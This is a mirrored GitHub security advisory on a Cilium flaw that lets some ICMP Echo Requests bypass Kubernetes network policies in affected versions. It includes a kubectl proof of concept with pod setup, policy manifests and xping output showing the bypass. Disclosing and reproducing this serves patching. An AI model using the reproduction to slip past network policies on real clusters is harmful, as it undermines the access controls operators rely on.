Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-c66w-hq56-4q97

Опубликовано: 21 мая 2021
Источник: github
Github: Прошло ревью

Описание

Network policy may be bypassed by some ICMP Echo Requests

Impact

Under certain conditions, ICMP Echo Request sent to a Cilium endpoint from an actor may bypass a network policy which disallows access from the actor to the endpoint, but allows from the endpoint to the actor. This does NOT apply to UDP and TCP traffic.

The actor is either a pod or a cluster host or a remote host.

The following conditions must be met:

  1. Network policies have been created which: a) do not allow access from the actor to the endpoint; b) allow access from the endpoint to the actor and does not specify neither protocol nor port.
  2. The endpoint has sent ICMP Echo Request to the actor with the ICMP identifier X.
  3. The actor sends ICMP Echo Request to the endpoint with the same ICMP identifier X.
  4. The request from the actor (3.) is sent before the Cilium's conntrack GC has removed the previously created conntrack entry (2.).

Detailed description

See https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e (v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79 (v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37 (v1.7.x).

Example

$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600 $ kubectl run client --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600 $ cat <<EOF | kubectl apply -f apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: server-netpol # allow client->server spec: podSelector: matchLabels: run: server ingress: - from: - podSelector: matchLabels: run: client policyTypes: - Ingress --- apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: client-netpol # deny any->client spec: podSelector: matchLabels: run: client policyTypes: - Ingress EOF $ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP PING 10.154.0.50 (10.154.0.50): 56 data bytes ^C --- 10.154.0.50 ping statistics --- 1 packets transmitted, 0 packets received, 100% packet loss <--- "client-netpol" policy denied command terminated with exit code 1 $ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP PING 10.154.1.16 (10.154.1.16): 56 data bytes 64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822 ms --- 10.154.1.16 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss <--- "server-netpol" policy allowed round-trip min/avg/max = 0.822/0.822/0.822 ms $ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP PING 10.154.0.50 (10.154.0.50): 56 data bytes 64 bytes from 10.154.0.50: seq=0 ttl=60 time=0.527 ms --- 10.154.0.50 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss <--- "client-netpol" policy bypassed round-trip min/avg/max = 0.527/0.527/0.527 ms

For more information

If you have any questions or comments about this advisory:

Ссылки

Пакеты

Наименование

github.com/cilium/cilium

go
Затронутые версииВерсия исправления

>= 1.7.8, <= 1.7.14

1.7.15

Наименование

github.com/cilium/cilium

go
Затронутые версииВерсия исправления

>= 1.8.3, <= 1.8.7

1.8.8

Наименование

github.com/cilium/cilium

go
Затронутые версииВерсия исправления

>= 1.9.0, <= 1.9.4

1.9.5